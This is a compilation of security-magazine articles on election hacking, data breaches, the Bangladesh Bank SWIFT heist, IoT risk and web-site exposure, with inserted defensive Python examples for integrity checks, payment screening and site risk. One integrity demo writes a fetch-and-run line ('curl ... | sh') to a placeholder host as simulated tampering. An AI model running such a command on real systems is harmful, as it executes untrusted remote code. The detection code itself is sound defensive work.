If Moscow can install a US President it desires with such alacrity, Washington stands completely vulnerable to such excesses. Russia has simultaneously proved it can subjugate its most powerful adversary without firing a single shot or launching a single missile. “Putin’s public views of the disclosures suggest the Kremlin and the intelligence services will continue to consider using cyber-enabled disclosure operations because of their belief that these can accomplish Russian goals relatively easily without significant damage to Russian interests,” the report notes. American intelligence determined that its Russian
counterpart had researched US electoral processes and related technology and equipment since early 2014, gained access to Democratic National Committee (DNC) networks as early as July 2015 and maintained that access until at least June 2016. It also found that some Russian paid social media users, or 'trolls', had started to advocate for Trump by December 2015. It further established that Russia's General Staff Main Intelligence Directorate (GRU) had targeted cyber operations at the US election from March 2016, collecting against primary campaigns, think tanks and lobbying groups it viewed as likely to shape future US policies. The US intelligence report makes no mention of when the Obama administration was made aware of the Russian campaign, though President Obama likely knew early enough through the intelligence-focused Presidential Briefs scheduled for him daily at the White House. Yet 'retaliation' came only on December 9, when he ordered a full review into the malicious cyber activity. Twenty days later, once the intelligence report was out, he issued an executive order providing additional authority to respond to cyber activity aimed at interfering with or undermining the US's election processes and institutions, or those of its allies or partners. Under that new authority, the President sanctioned
the GRU, Russia's military intelligence, and the FSB, the civilian security service, along with four GRU officers and three companies that provided material support to the GRU's cyber operations. Obama also ordered the expulsion of 35 Russian diplomats and the closure of two "recreational facilities" in New York and Maryland allegedly used for Russian intelligence activities, pledging further actions, "some of which will not be publicized". It is curious why this reprisal was so late in coming. It raises the question whether US intelligence had failed to gauge the Russian campaign early enough, or had the knowledge but failed to inform the Obama administration in time, or, if it did inform in time, whether Washington had been unable to counter, or incapable of countering, the cyber intrusion, or even to control the damage it was causing. If the Obama administration now concludes that the election result has been completely stage-managed by a hostile external power, it must redress this fraud on its nationhood by using the option of declaring the 2016 elections null and void and seeking a re-election. After all, the winning candidate, Trump, has also acknowledged Russian meddling. As Moscow has denied any intervention and called for evidence of its involvement, Obama must heed the call by all Democratic senators on the Senate Intelligence Committee to declassify the full intelligence report. While the US Constitution provides no scope for re-election, it could be allowed if Congress were to pass a Constitutional amendment for ratification by 38, or three-fourths, of the 50 States. The US Supreme Court, too, could order a re-vote if it ascertained massive fraud in the electoral process. Washington could also approach the United Nations and its International Court of Justice under Article 2(4) of the UN Charter. The Article proscribes the threat or use of force by all UN members against the territorial integrity or political independence of any state. The UN Security Council can take or authorise measures of collective enforcement against the aggressor, the International Court having identified 'force' as such regardless of the weapons employed. This would include cyber operations, once their effects are deemed comparable to armed aggression. The Security Council's responsibility extends to maintaining international peace and security in cyberspace. Any further inaction on this cyber war will only embolden the assailant and render the US vulnerable to greater hostility in future.
Are you ready for your next data breach? How confident are you in protecting your assets from a confidentiality, availability, and integrity breach?
By Boaz Fischer
If anything, the NSA breach by Edward Snowden just shows that none of us are ready. In simple terms, most organizations find it challenging to allocate investment and resources appropriately towards mitigating a confidentiality, integrity or availability breach. What do I mean by this? Most organizations invest heavily in security technologies and mistakenly focus on achieving high levels of "availability" as a best practice, because Service Level Agreements are built around it. However, they neglect to implement appropriate security strategies for protecting confidentiality and integrity. This is a recipe for disaster. "Availability" does not equate to "security". Take, for example, the so-called Denial-of-Service attack on the Australian Bureau of Statistics (ABS) census website in August 2016. The website was overloaded, and thousands of Australians (including myself) were prevented from taking part in the census. Attacking "availability" in this way certainly left an embarrassing dent in this government-led initiative, which may in turn affect future online government projects (such as online voting) for many years to come. And then there's the Red Cross data breach of October 2016. Personal data belonging to 550,000 blood donors was leaked from the Red Cross Blood Service. This should never have happened to an organization responsible for storing and protecting highly sensitive personally identifiable information (PII). We all make mistakes. We're human. However, leaving sensitive data exposed on a public web server is about as irresponsible as it gets when it comes to security fumbles.
Where are the necessary controls and checks? The potential ramifications of exposing donors' data include anything from identity theft to blackmail. Worse still, people might be dissuaded from donating blood in future for fear of their own personal details being compromised. A breach of "confidentiality" is a serious issue. Lives are at stake, and many executives who hold sensitive information simply do not understand the repercussions. What is alarming is that most organizations do not even know where their most sensitive data is located, let alone what it contains or how sensitive it is: another recipe for disaster. Digital collaboration is at the heart of every business process; files are created, stored and shared at a rapid pace. Yet it seems nearly impossible to keep track of who has and needs access to all of this information, and who doesn't. Are you on top of your strategy for protecting your sensitive data? Organizations tend to think that their data access is under control, but dig a little deeper and holes start to appear. Most organizations grant access readily, yet revoke it infrequently. Don't assume that your Human Resources team is the only group of internal employees who can see the HR data, or that an employee who left the company last month has had all of his or her permissions revoked. This is rarely the case. Let's be clear: an attack on data "integrity" can be highly challenging to identify or block. Hidden within your large volume of daily system changes are a few that can impact the organization's operations. These include unexpected changes to a file's credentials, privileges or hash value, and changes that cause a configuration's values, ranges or properties to fall out of alignment with your security policy. A recent survey by CEB found that 90% of employees violate policies set up to prevent data breaches. Why? When convenience and productivity are prioritized over security, employees often put sensitive data at risk while simply trying to get a job done. We also know that 90% of all incidents are caused by people (Verizon 2015 Data Breach Investigations Report). Whether it is due to carelessness or malicious intent, the greatest risk to your organization is your internal employees, privileged IT users and third-party vendors. Therefore, when establishing a protection strategy for your assets, it is crucial to address user-based risks and to invest in confidentiality, integrity and availability in equal measure.
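The integrity checks the paragraph above describes (a file's hash, permission bits and owner drifting from a known-good state) as an added example; this is not code from the author or from any product named on this page. It records a baseline for every regular file under a directory, then reports what changed. The files and the tampering are constructed in a temporary directory, so it runs offline and the scenario is illustrative only.

```python
"""File-integrity baseline and drift report (added example)."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def _digest(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def baseline(root):
    """Map relative path -> (sha256, permission bits, uid, gid) for every
    regular file under root. Symlinks are skipped so a link swap cannot
    masquerade as an unchanged file."""
    root = Path(root)
    snap = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.stat()
            snap[p.relative_to(root).as_posix()] = (
                _digest(p), stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    return snap


def drift(before, after):
    """List of (path, kind) findings: added, removed, content, mode, owner.
    A single file can yield several findings (e.g. content and mode)."""
    findings = []
    for path in sorted(set(before) | set(after)):
        if path not in before:
            findings.append((path, "added"))
        elif path not in after:
            findings.append((path, "removed"))
        else:
            (h0, m0, u0, g0), (h1, m1, u1, g1) = before[path], after[path]
            if h0 != h1:
                findings.append((path, "content"))
            if m0 != m1:
                findings.append((path, "mode"))
            if (u0, g0) != (u1, g1):
                findings.append((path, "owner"))
    return findings


def demo():
    """Constructed scenario: take a baseline, tamper with the tree, report."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "etc").mkdir()
        (root / "etc" / "app.conf").write_text("listen=127.0.0.1\n")
        (root / "bin").mkdir()
        (root / "bin" / "tool").write_bytes(b"#!/bin/sh\necho ok\n")
        os.chmod(root / "bin" / "tool", 0o755)
        before = baseline(root)

        # Simulated unauthorised changes: config edited to listen on all
        # interfaces, binary made world-writable, unexpected script dropped.
        (root / "etc" / "app.conf").write_text("listen=0.0.0.0\n")
        os.chmod(root / "bin" / "tool", 0o777)
        (root / "bin" / "cron.sh").write_text("curl http://example.invalid | sh\n")
        after = baseline(root)
        return drift(before, after)


if __name__ == "__main__":
    for path, kind in demo():
        print(f"{kind:8s} {path}")
```

In practice the baseline is stored somewhere the monitored host cannot rewrite it, and the report is compared against approved change records; a finding that matches no change ticket is the integrity attack the article says is hard to see.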
About the Author
Boaz Fischer is a recognized leader in promoting security best practices, awareness and governance, as well as a renowned authority in the Insider Threat Management space. Boaz has published two security books and numerous security articles, and has been nominated for multiple security awards. You can find more information about CommsNet Group here: www.commsnet.com.au. To find out more about how ObserveIT helps organizations to prevent internal breaches, visit www.observeit.com
What Can You Do About Preventing Internal Data Breaches?
If you want to implement practical steps towards preventing your next data breach, it is vital to cover your organization strategically against insider threats by developing and implementing an Insider Threat Program. An Insider Threat Program will provide you with a robust, repeatable set of processes that you can use to identify and eliminate user-based risks. Secondly, it is important to adopt an Insider Threat Management solution that gives you clear visibility into who is doing what. Without this real-time visibility, you will continue to be in the dark when it comes to preventing confidentiality, integrity and availability breaches.
Need Help? ObserveIT offers an effective way for you to prevent data breaches, whether they are caused by careless internal users, third-party vendors or privileged IT users. Find out how you can implement:
• Real-time security education (and blocking where necessary)
• Deterrence against malicious users at the point of policy violation
• Automated alerts and analytics to detect and predict risky behavior
• Rapid investigation to reduce costs
The Chinese New Year heist
By Jane Lo, Singapore Correspondent
A traditional Chinese New Year celebration with volumes of ‘prosperity and good luck’ money gifts, asynchronous working days across two time zones, procedural and regulatory vulnerabilities, straight-through automated processing: these were among the elements that delayed the detection of and response to the Bangladesh Central Bank cyber break-in, and allowed sophisticated, well-organized criminals to launch their attacks on the payment system linking the Bangladesh Central Bank, the Federal Reserve Bank of New York and a network of commercial and correspondent banks. They almost carried off a haul of US$1 billion; two words raised red flags and stopped 31 of the 35 fraudulent transactions, but not before US$81 million had made its way into the casino industry in the Philippines.
What do we know so far?
The attack combined the modern technique of hacking into computers with malware and old-fashioned money laundering skills. Investigations by the authorities suggested that preparatory work may have begun as long as a year earlier, in May 2015, with the opening of bank accounts at a Philippines bank (Rizal Commercial Banking Corporation), after which the accounts were left dormant without any transactional activity until the attack in February 2016. The introduction of the malware into the Bangladesh Central Bank is likely to have taken place at least a month prior to the attack. Audit trails suggested the possibility of trial runs being conducted beforehand.
According to the Bangladesh Police Criminal Investigation Department, the computer network at the Bangladesh Central Bank was not adequately secured: an unprotected firewall combined with weak passwords, and unused ports and a remote access channel that were not adequately hardened, opened up entry points and allowed the criminals to penetrate the network perimeter. Procedural vulnerabilities, where contingency plans in the event of a breakdown of equipment (in this case the cross-border payment SWIFT software and the printer which would have listed payment instructions) and alternate communication channels failed to kick in, prevented rapid detection of and response to the breach. Additionally, timeliness of response was complicated not only by time zone differences but also by asynchronous workweeks between Bangladesh and New York.
An extra layer of protection from anomalous pattern detection raised red flags: the materiality and frequency of the payment instructions from the Bangladesh Central Bank, which appeared out of the norm, a misspelled word, and a name on the United States' sanctions list against Iran. But by then $81 million had already been cleared and paid out. And the heist was perfectly timed during a holiday period, when significant fund flows into casino accounts were not unexpected, so the attack was not disrupted at the end of the chain. Crucially, the CCTV cameras in the Philippines bank were disabled during this period, highlighting the organized nature of the attack.
Timeline of key events during the attack
The 35 fake transactions from the Bangladesh Central Bank were sent on Thursday 4th February 2016 over a span of a few hours. Detection and response stretched over the next few days, including the following Monday, 8th February 2016, the first day of Chinese New Year in the Philippines.
Mitigating the Threats and Vulnerabilities
Two attacks have come to light since the Bangladesh Central Bank heist: $12 million stolen from Ecuador's Banco del Austro in 2015, and a foiled attempt at Vietnam's Tien Phong Bank in May 2016. To address the vulnerabilities and the elements that contributed to the weakened defenses, including areas where legal and regulatory arbitrage opportunities make funds stolen in one country and transferred to another difficult to recover, SWIFT (the Belgium-based co-operative owned by its user banks) and the Philippines government have introduced several initiatives.
SWIFT announced that from December it would provide 'Daily Validation Reports' listing the messages sent from a client's SWIFT terminal, to allow a bank to better spot fraudulent payment instructions, and also showing anomalies in the transfer instructions: deviations from the client's typical payment patterns. As an added safety measure, these would be sent to clients’ payments and compliance teams through a channel separate from the SWIFT terminal, minimizing the exposure to a single point of failure.
At the Black Hat USA Conference in 2016, Alain Desausoi, SWIFT’s CISO, emphasized the need for greater levels of intelligence sharing across the global financial community. Highlighting the work of the cooperative’s Customer Security Program, he underscored SWIFT’s commitment to exchange threat intelligence with its community: “Having accurate, up to date information on relevant cyber threats is critical.
We are committed to driving greater levels of intelligence sharing across the global community through our Customer Security Program.”
The Philippines Casino Anti-Money Laundering and Combating Financing of Terrorism Act Bill (House Bill 14), introduced by Quezon City Representative Feliciano Belmonte Jr, aims to tighten money laundering regulations and make it mandatory for casinos to report all suspicious financial transactions, irrespective of the amount. The proposed bill requires casinos regulated by the Philippine Amusement and Gaming Corporation (PAGCOR), the Cagayan Economic Zone Authority or any other regulatory body to report all suspicious transactions to the Anti-Money Laundering Council (AMLC). In the explanatory note to the proposed bill, Belmonte said: “The significance of including the casino sector under the coverage of the Anti-Money Laundering Law was underscored by the Bangladesh Bank heist. Attempts to trace and recover the money encountered several setbacks, as casinos are excluded from the coverage of the country’s present anti-money laundering laws. This bill seeks to address this deficiency by putting the necessary amendments to discourage the use of the casinos as avenues of illicit activity. The provisions of this bill will help ensure the integrity of financial and banking institutions in the country, and is a crucial step in making the Philippines compliant with international standards.”
“The work of the compliance department is more important now, and bank management appreciates that,” noted Dante Fuentes, president of the Association of Bank Compliance Officers and of the Association of Certified Fraud Examiners Philippines Chapter.
The Philippines National CyberSecurity Plan 2022
The Department of Information and Communications Technology (DICT) launched on 8th December the initiative known as the National Cybersecurity Plan 2022, crafted by the Cybercrime Investigation and Coordination Center (CICC), an attached agency of the DICT. The framework aims to ensure the continuous operation of critical “infrastructures”, public and military networks, businesses and supply chains, and to launch a public awareness campaign. It intends to establish a National Computer Emergency Response Team (NCERT) to build the capability and capacity of the government for quick response and recovery during hacking incidents and other cyberattacks. “A capability building program of international standard must be set in place in accordance to the demands of digital forensics, network analytics and defense conceptualization, among others,” said Allan Cabanlong, DICT assistant secretary and CICC executive director.
“Included in the cooperation are detection and mitigation approaches, frameworks for coordination of international originators of attacks, and co-design of stakeholder engagement strategies.”
Under the cybersecurity governance framework, the DICT will be in charge of coordinating national protection, prevention, mitigation and recovery from cyber incidents; dissemination of domestic cyber threat and vulnerability analysis; security of government and civilian infrastructure; and investigation of cybercrimes under its jurisdiction. The Department of Justice (DOJ), Philippine National Police (PNP) and the National Bureau of Investigation (NBI) will be the lead agencies for the investigation and prosecution of cybercrimes, as well as the enforcement of cybersecurity laws. The Department of National Defense (DND) will be in charge of defending the country from cyber-attacks, intelligence gathering on foreign cyber threats, securing national security and military systems, and investigation of cybercrimes under military jurisdiction. The CICC, mandated to establish cybersecurity measures to guard against cyberthreats, is expected to enforce, evaluate and monitor the cybersecurity policies through regular assessment and compliance activities, the conduct of annual cyber drills and exercises, and a cybersecurity education and awareness program. “Rest assured that the DICT is in the frontline of cybersecurity protection for the Filipino people,” DICT secretary Rodolfo Salalima said at the press briefing.
What to expect next?
According to recent updates announced in December, the Head of the Forensic Training Institute of the Bangladesh Police's Criminal Investigation Department, Mohammad Shah Alam, mentioned that arrests are likely soon. With Chinese New Year fast approaching, the authorities will likely be extra vigilant and watch out for the modus operandi of an impending attack by the same or another criminal syndicate. That last year Chinese New Year fell on Monday 7th Feb and was a declared public holiday in the Philippines would have formed part of the calculations when the criminals timed their attack. As the Chinese Year of the Rooster is ushered in on 28th January this year, a Saturday with no extended long weekend to evade and delay detection, it would be a knee-jerk reaction in the extreme to suggest this denies the attackers the perfect window of opportunity to perpetrate the same crime. After all, it is not unrealistic to believe that the attackers have grown more resourceful, sophisticated and adaptive in the past year, and they may very well have the skills, determination, boldness, ingenuity and the nerve to strike again.
Sources: Reuters, Bloomberg, Financial Times, PhilStar, New York Times, BAE Systems, Wall Street Journal
About the Author
Jane Lo has more than 15 years of experience in enterprise-wide risk management and writes on risk themes relevant to the financial services sector. She started her career in Canada after graduating in Electrical and Computer Engineering, and worked in the City of London for 10 years consulting for corporates and banks, before relocating back to Singapore 6 years ago. Outside of work, she is a marathon runner and enjoys spending time with friends and family.
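The red flags the article describes (out-of-norm materiality and frequency of instructions, a misspelled word, a watch-listed name) and the pattern deviations SWIFT's Daily Validation Reports surface amount to screening rules over a day's outgoing instructions. The Python below is an added example, not SWIFT's or the article's code; the payment history, names, vocabulary and watch-list entry are all constructed placeholders, and none is a real sanctioned party.

```python
import re
from statistics import mean, pstdev


def zscore_flag(value, history, z_limit=3.0):
    """True when value sits more than z_limit standard deviations above the
    historical mean; the materiality and frequency checks both use this."""
    mu, sd = mean(history), pstdev(history)
    if sd == 0:
        return value > mu
    return (value - mu) / sd > z_limit


def words(text):
    return re.findall(r"[a-z]+", text.casefold())


def name_on_list(name, watch_list):
    """Hit when every token of a watch-list entry occurs in the name, so a
    suffix such as 'Ltd' or a re-ordered name does not hide the match."""
    name_tokens = set(words(name))
    return any(set(words(entry)) <= name_tokens for entry in watch_list)


def unknown_words(text, vocabulary):
    """Words in the free-text field outside the expected vocabulary: a crude
    stand-in for the misspelling that drew attention in the real case."""
    return [w for w in words(text) if w not in vocabulary]


def screen_day(instructions, history, watch_list, vocabulary):
    """Screen one day's outgoing instructions; returns [(ref, [flags])]."""
    day_frequency = zscore_flag(len(instructions), history["daily_counts"])
    results = []
    for ins in instructions:
        flags = []
        if day_frequency:
            flags.append("frequency")
        if zscore_flag(ins["amount"], history["amounts"]):
            flags.append("materiality")
        if name_on_list(ins["beneficiary"], watch_list):
            flags.append("watch_list")
        bad = unknown_words(ins["details"], vocabulary)
        if bad:
            flags.append("spelling:" + ",".join(bad))
        results.append((ins["ref"], flags))
    return results


# Constructed history: a few messages a day, each in the low millions.
HISTORY = {"daily_counts": [2, 3, 4] * 30,
           "amounts": [1_000_000, 2_000_000, 3_000_000, 4_000_000] * 20}
WATCH_LIST = {"Constructed Sanctioned Entity"}   # placeholder, not a real name
VOCABULARY = {"invoice", "settlement", "payment", "for", "consulting",
              "services", "shipping", "fee", "foundation"}


def constructed_batch():
    """35 instructions in one day: 32 routine ones plus three that carry
    an extra flag each (materiality, watch list, spelling)."""
    batch = [{"ref": f"TX-{i:03d}", "amount": 2_000_000,
              "beneficiary": f"Routine Supplier {i}",
              "details": "invoice settlement"} for i in range(1, 33)]
    batch += [
        {"ref": "TX-033", "amount": 20_000_000,
         "beneficiary": "Routine Supplier 33", "details": "invoice settlement"},
        {"ref": "TX-034", "amount": 2_000_000,
         "beneficiary": "CONSTRUCTED SANCTIONED ENTITY LTD",
         "details": "payment for consulting services"},
        {"ref": "TX-035", "amount": 2_000_000,
         "beneficiary": "Routine Supplier 35",
         "details": "paymnt for shipping fee"},
    ]
    return batch


if __name__ == "__main__":
    for ref, flags in screen_day(constructed_batch(), HISTORY,
                                 WATCH_LIST, VOCABULARY):
        if flags != ["frequency"]:   # every message that day carries the frequency flag
            print(ref, flags)
```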
Australia just can’t hack it
By Ryan Linn, Director of Advanced Threats and Countermeasures, Nuix
I’ve been reflecting on a number of conversations I had, and on some of the concerns people expressed to me about cybersecurity, during my recent two-week trip to Australia. One thing has particularly drawn my attention: cybersecurity is only now becoming a talking point in Australia. In the United States, we are inundated at least once a week with stories about this hack or that hack. As a result, organisations are at most just a few days away from another heavily publicised incident. This has led to individuals becoming more concerned with security, and this awareness puts them in a better position to protect themselves online. For various reasons, I don’t think Australia is quite there yet.
Cybersecurity should be a national issue
Raising awareness is the first step to protecting Australian businesses and critical infrastructure. The Australian Government has delivered its Cyber Security Strategy and made efforts to increase awareness of security issues. The distributed denial of service attacks that disrupted the 2016 census helped make security very real and visible. So did the recent announcement that the Australian Red Cross Blood Service had accidentally published the details of 550,000 blood donors on its website. However, such announcements are relatively rare because the Australian Government has still not enacted mandatory breach disclosure legislation. As a result, many organisations that suffer breaches try to sweep the matter under the carpet rather than suffer the bad publicity, and other consequences, that come from telling people what happened. Until Australians are aware of the true frequency and scope of data breaches and broader security threats, cybersecurity will not become a national concern and it will be hard to focus the minds of lawmakers and business executives on these issues.
Visibility into your networks is critical
Across the globe we suffer from a lack of security as well as a lack of insight into what’s happening on our networks, computers and phones. Computing is becoming more powerful and user interfaces are making computers easier to use at the expense of visibility. Why is visibility so critical when we have antivirus, firewalls and all of these other technologies protecting us? The answer is that attackers are staying one step ahead of the good guys and, as a result, it’s fairly easy to bypass many of these security controls. I’ve heard the phrase “We haven’t been breached … as far as we know” more times than makes me comfortable. What is most distressing about this statement is that many people don’t even have a grasp on what a breach is. If your organisation has had a virus, malware or any other malicious application appear on one of your systems, you’ve been breached. These breaches are relatively easy to deal with by reinstalling the machine, using a cleaning tool, or hoping your antivirus software caught all the pieces. However, all of these pieces of malware have a purpose besides just infecting machines. If you don’t know what that purpose was, it’s impossible to know what the impact of the breach has been. The emergence of ransomware has brought this issue to the forefront, yet most people don’t consider ransomware a breach. If someone else is holding your data hostage, how do you know they don’t have a copy? “Doxware” such as the Chimera ransomware doesn’t just hijack your data and encrypt it; it also releases your data online if you don’t pay promptly. The takeaway from this is that regardless of whether or not you think you’ve been breached, the truth is that you have; you just may not know what was taken. This is where insight comes into play. The more visibility you have into what’s happening on your device, the better your chances of detecting a breach and mitigating the damage before it becomes critical. As we push forward with technology, we now have to worry about internet-connected doorbells and refrigerators, not just computers, phones and network hardware.
The vulnerabilities of the internet of things
“Internet of things” devices such as thermostats, door locks, lighting and household appliances are becoming the latest attack surface. Attackers are looking at these devices and realising that not only do device owners have no visibility into what’s happening on their devices, many do not even know how the device is connected to the network and managed. The outcome is that attackers know more than the consumer, which puts all of us at a disadvantage. To understand the extent of the problem, look at sites like Insecam that trawl the web looking for publicly available internet-connected cameras that use default credentials (admin:admin, for example) or sometimes no credentials at all. You can watch people from around the world from the comfort of your living room and, in some cases, watch them type in their usernames and passwords, credit card numbers and other sensitive data. So why are these devices so vulnerable? Because we as consumers aren’t telling companies that security is as important to us as functionality. Once we do, security will become more of a priority for these companies. We have to be willing to pay for products that do it right instead of shopping for what’s cheapest or just buying something because it works. We have to take responsibility for our security and hold companies accountable if we are to collectively reduce our risk of a cyberattack.
What’s next?
So what do we need to do to protect ourselves? Prioritising security in our everyday lives is a solid start. Take the example of two products or services that are identical except for price and security. By basing our purchasing decision on security, we’re signalling to the vendors that we’d rather have a solid product, even if it costs a few more dollars. As we move forward and start to demand security in everything from our bank accounts to our baby monitors, we drive the industries that we consume to do better. This isn’t a problem that was created overnight, so we shouldn’t expect it to be solved overnight either. Rather, by making sure we are diligent with our data and demanding that others do the same, we can keep pushing towards the levels of security that we need to protect ourselves from the world of chaos on the internet.
Editor’s insight interview: Big Data and analytics expert
Ravi Hubbly works in complex data environments. His expertise is in enabling an enterprise to transform data sets to generate greatly enhanced risk evaluation and decision making. Ravi and his team work with a range of business stakeholders and across industries, including space missions and security. With 20+ years of information technology experience, Ravi leads the Leidos thought leadership group and advises customers on big data project implementations, as well as influencing industry-leading tool vendors and internal research data analytics initiatives.
In 2016, global science and technology solutions company Leidos announced the successful completion of its merger with Lockheed Martin’s Information Systems & Global Solutions (IS&GS) business. Globally this created a US$10 billion company dedicated to “complex systems integration and service provision with an innovative, smart technology-culture.” Amongst Ravi’s accomplishments, he has successfully delivered data environments for the Center for Medicare and Medicaid in analytics environment modernisation, NASA’s Human Research Program and the Centers for Disease Control and Prevention’s HIV outbreak. One of the major customers of Leidos is a large US government agency where modern data analytics is applied for consumer protection and monitoring against bad business behaviour.
Speaking with the Australian Security Magazine, Ravi explained, “Typically what we have seen with these organisations in general is that most of them are interested in link analysis and how strong those connections are. Based on those connections they can learn to predict behaviour, and that kind of analysis is a very strong area of capability that law agencies are utilising. They are also constrained by the tools they currently have available.”
“Our solutions make it feasible to apply a big data solution that handles all kinds of data: video, audio, structured data sets, semi-structured sets and logs. Capturing huge sets of data from various data sources, we can then process them to identify profiles and data sets.”
“We can access an agency’s databases, criminal investigation reports, match them to social media and data from across other government agencies’ databases, and should we include additional data sets, such as geospatial information, we can create a diverse and highly valuable data set. These solutions are applicable to defence, law enforcement, government and civil agencies.”
“Our solutions to customers include using open solutions. With technology constantly changing and organisations getting caught in proprietary systems, which often exclude other technology opportunities, our platform is an open platform with various interfaces and designed for plug and play application. It’s like a Lego box: you choose pieces to plug in and it remains an open architecture, end-to-end solution. The analytics platform is called CAADS – Collaborative Advanced Analytics Data Sharing – which allows customers to integrate the platform into their data environment and framework, providing the support for a working solution in solving their business needs. Our business model is not around selling tools and technologies. It is around solving problems. It is referenced to the solution and based on the number of users and based on data sizes. We have applied CAADS broadly, from healthcare insurance companies and healthcare providers through to space agencies, where it was applied for focusing on human safety in space. At its core, it can be applied to treasury, regulations, manufacturing and for money markets, or supporting research work, new drug developments and new healthcare models. CAADS is based on technologies similar to Google, where Google stores and accesses the data via links, and we’re running an integrated set of tools on top of a Cloudera Hadoop cluster.”
Leidos partners with Cloudera and Intel, taking a differentiating approach with no coding requirement, so it does not need an ‘IT’-dependent approach to generating and accessing the data. That means the business does not need to know coding; it can simply ‘click, drag and drop’. This is designed to empower business users to be self-reliant, making it easy for end users to apply without relying on IT teams to provide solutions. The data science can apply self-learning and artificial intelligence: the system learns how users are using the data and what kind of operations are running, and then becomes prescriptive, suggesting approaches to data analytics.
Leidos has launched its Australian business and employs over 900 Australians in Canberra and Melbourne. Christine Zeitz, Managing Director of Leidos Australia, confirmed: “We are building on our existing customer base which includes the Department of Defence Centralised Processing program valued at nearly $1 billion and the Service Management and End User Computing contract with the Australian Taxation Office worth roughly $470 million. Whilst we have a strong heritage in the defence business, we are also committed to working in cyber security, big data, airport, and air traffic management systems.” Leidos also recently announced it has been awarded the Joint Project 2030 Joint Command Support Environment Phase 8 Sustainment contract, to the value of AUD$55M. A CAADS demo is available at https://www.leidos.com/healthcare/advanced-analytics
“There is no such thing as a safe site”
By Chris Cubbage, Executive Editor
The threat landscape and website risk have increased, with nearly half of the top 1 million websites at risk, according to Menlo Security’s State of the Web 2016 report released this week. In addition, the report found that the attackers are young, savvy and are getting their hands on exploit tools that are readily available, easy to get, easy to deploy and highly effective and lucrative in their impact. As if to support the report, between 5 and 9 December, Europol and law enforcement authorities from Australia, Belgium, France, Hungary, Lithuania, the Netherlands, Norway, Portugal, Romania, Spain, Sweden, the United Kingdom and the United States carried out a coordinated action targeting users of Distributed Denial of Service (DDoS) cyber-attack tools, leading to 34 arrests and 101 suspects interviewed and cautioned. Suspects in the EU and beyond were mainly young adults under the age of 20. The individuals arrested are alleged to have been paying for stresser and booter services to maliciously deploy software to launch DDoS attacks, which flood websites and web servers with massive amounts of data, leaving them inaccessible to users. The tools used are part of the criminal ‘DDoS for hire’ facilities for which hackers can pay and aim at targets of their choosing. This is the state of the Internet as we move into 2017! The combination of widespread software vulnerabilities, pervasive exploit kits and throngs of new attackers has created the perfect storm. Traditional security products are failing, with web-based and email attacks unable to be stopped by simply applying “a good or bad approach”, as we don’t understand what’s going to be bad tomorrow, according to Greg Maudsley, Senior Director of Product Marketing at Menlo Security.
Phishing attacks can now use legitimate URLs: attackers can compromise a legitimate site and create ‘drive-by attacks’ or a spoof link within a legitimate website, meaning there are no obvious anomalies in the URL that anti-phishing techniques can pick up. The report’s website review methodology involved developing a Chrome-based browser farm to review websites ‘through the eyes of a normal human’, visiting the sites, fingerprinting the code of the site’s software and correlating that to CVEs (Common Vulnerabilities and Exposures) and to the website’s reputation as a known bad or previously compromised site within the last 12 months; ticking any of these would class the site as ‘risky’.
News and media websites were considered the highest risk. Greg Maudsley pointed out the reason: “they are all competing to get and keep users’ attention so they’re aiming for the newest and richest content and keeping it as ‘sticky’ as possible – to do that they are serving up more and more active content – therefore more background content – it is the background sites that are beyond the control of the main sites.” The most important finding was that last year 30% of the web was classed as ‘risky’, but with each online request triggering up to 25 additional requests in the background, it is the factors associated with the background sites, included in this report, that lead to the conclusion that 46% of the top 1M sites are at risk. In other words, there is no such thing as a safe site. The statistics also showed a correlation with the type of software used, such as Microsoft-iis 7.5, which was the second most common vulnerable software seen in the Menlo Security report and is currently running on over 50,000 of the top one million websites. For an individual to compromise a web server running this software, it is a simple matter of using exploit kits readily available on the Internet to enable a total system compromise. Today, within minutes, any motivated attacker can exert full control over a primary or background site and deliver ransomware to unsuspecting visitors. Despite the term ‘risky’, the sites are not necessarily delivering malware; the term is rather meant to describe the risk of these sites being exploited by attackers. And as the Europol arrests confirm, there is no shortage of attackers; they are spread across the globe and they have all the tools they need!
2016 Highlights:
• News and media sites were riskiest overall, with 50% of sites being classified as risky
• Business and Economy sites this year came in as having the most recent threat history
• Unintentional background requests, which send content to the user, outnumber intentional user requests at a ratio of 25:1
• Nginx version 1.8.0 and Microsoft-iis version 7.5 were the most commonly used vulnerable software versions.
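The classification the report describes can be written down directly: a site is risky on its own account when its fingerprinted server software is a known vulnerable version or it was flagged as compromised within the last 12 months, and a page inherits risk from the background sites it loads, which is why the share rises once background requests are counted. The Python below is an added example, not Menlo Security's methodology code; the crawl records, domains and dates are constructed, and the vulnerable-version list holds only the two versions named in the highlights.

```python
import re
from datetime import date, timedelta

# The two versions the report's highlights name as most common vulnerable software.
VULNERABLE_VERSIONS = {("nginx", "1.8.0"), ("microsoft-iis", "7.5")}


def parse_server(header):
    """'Microsoft-IIS/7.5' -> ('microsoft-iis', '7.5'); None if unparseable."""
    m = re.match(r"\s*([A-Za-z-]+)/(\d+(?:\.\d+)*)", header or "")
    return (m.group(1).casefold(), m.group(2)) if m else None


def own_risk(site, today, vulnerable=VULNERABLE_VERSIONS):
    """Reasons a site is risky on its own account (empty list if none)."""
    reasons = []
    if parse_server(site.get("server")) in vulnerable:
        reasons.append("vulnerable-software")
    last = site.get("last_compromised")
    if last is not None and today - last <= timedelta(days=365):
        reasons.append("recent-compromise")
    return reasons


def classify(sites, today):
    """sites: domain -> {'server', 'last_compromised', 'background': [domains]}.
    Returns domain -> {'own': [reasons], 'via': [risky background domains]}."""
    own = {d: own_risk(s, today) for d, s in sites.items()}
    return {d: {"own": own[d],
                "via": [b for b in s.get("background", []) if own.get(b)]}
            for d, s in sites.items()}


def risky_share(result, primaries, include_background):
    """Fraction of primary sites counted as risky, with or without the
    risk inherited from their background requests."""
    risky = [d for d in primaries
             if result[d]["own"] or (include_background and result[d]["via"])]
    return len(risky) / len(primaries)


# Constructed crawl records; dates are relative to a fixed report date.
TODAY = date(2016, 12, 1)
CRAWL = {
    "news.example":  {"server": "nginx/1.12.0",
                      "background": ["ads.example", "cdn.example"]},
    "shop.example":  {"server": "Microsoft-IIS/7.5", "background": []},
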